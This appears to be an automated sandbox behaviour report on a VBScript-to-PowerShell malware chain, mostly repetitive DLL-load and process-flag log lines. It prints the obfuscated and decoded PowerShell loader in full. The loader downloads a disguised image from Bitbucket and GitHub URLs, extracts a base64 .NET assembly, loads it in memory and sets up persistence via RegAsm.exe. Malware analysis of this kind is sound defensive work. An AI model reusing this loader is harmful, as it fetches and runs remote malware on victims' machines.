Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#", "0")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00414EED LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

13_2_00414EED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0045245D push esi; ret	13_2_00452466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0044A616 push ecx; ret	13_2_0044A629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042C766 push ecx; ret	13_2_0042C779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0044AE78 push eax; ret	13_2_0044AE96

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00404A3B ShellExecuteW,URLDownloadToFileW,

13_2_00404A3B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

13_2_00413168

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

13_2_00414EED

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
